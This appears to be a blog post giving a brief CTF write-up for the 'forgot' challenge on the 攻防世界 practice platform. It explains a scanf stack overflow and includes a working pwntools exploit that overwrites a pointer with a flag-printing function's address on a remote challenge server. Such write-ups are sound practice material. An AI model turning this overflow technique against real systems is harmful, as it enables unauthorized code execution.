攻防世界2

樊少泽2024-10-13 22:21

forgot

发现是32位文件

fgets(s, 32, stdin)限制读入32位字符,无法利用

__isoc99_scanf("%s", v2) 典型的栈溢出

发现cat flag

覆盖v2-v3,覆盖为cat flag的函数地址

exp:

python 复制代码 
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('61.147.171.105','56662')
door = 0x80486CC
io.recvuntil(b'>')
payload = b'aaaa'
io.sendline(payload)
io.recvuntil(b'>')
padding = b'a'*(0x74-0x54+0x4)
payload1 = padding + p32(door)
io.sendline(payload1)
io.interactive()
相关推荐
123过去6 分钟前
hashid使用教程
linux·网络·测试工具·安全
C+++Python19 分钟前
Linux/C++多进程
linux·运维·c++
最贪吃的虎20 分钟前
GitHub推送又超时了?试试SSH
运维·ssh·github
XZY02829 分钟前
如何使用grpc
运维·服务器
rleS IONS32 分钟前
SQL2000在win10上安装的方法
运维·服务器
Stack Overflow?Tan901 小时前
linux ubuntu22.04安装ROS2humble完整版的流程
linux·docker·ros2
zly35001 小时前
centos7 sshd无法启动
linux·运维·服务器
编程大师哥2 小时前
Linux 命名管道(FIFO)通信 超清晰讲解
linux·运维·服务器
Smile_2542204182 小时前
linux服务器清理磁盘
linux·运维·服务器
KivenMitnick2 小时前
Claude Code--Ubuntu Linux超详细配置教程(附每步的可能报错及解决方法)
linux·运维·ubuntu
热门推荐
01GitHub 镜像站点022026年3月AI领域大事件:DeepSeek引领开源风暴03Qwen3.5-Omni与Qwen3.6模型全面解析(含测评/案例/使用教程)04Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services05AI 编程效率翻倍:Superpowers Skills 上手清单 + 完整指南06Mac 本地部署 OMLX + 通义千问 Qwen3.5-27B 保姆级教程07UV安装并设置国内源08让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南09深扒 Claude Code Buddy 模式:一只仙人掌背后的确定性随机算法10如何解决 OpenClaw “Pairing required” 报错:两种官方解决方案详解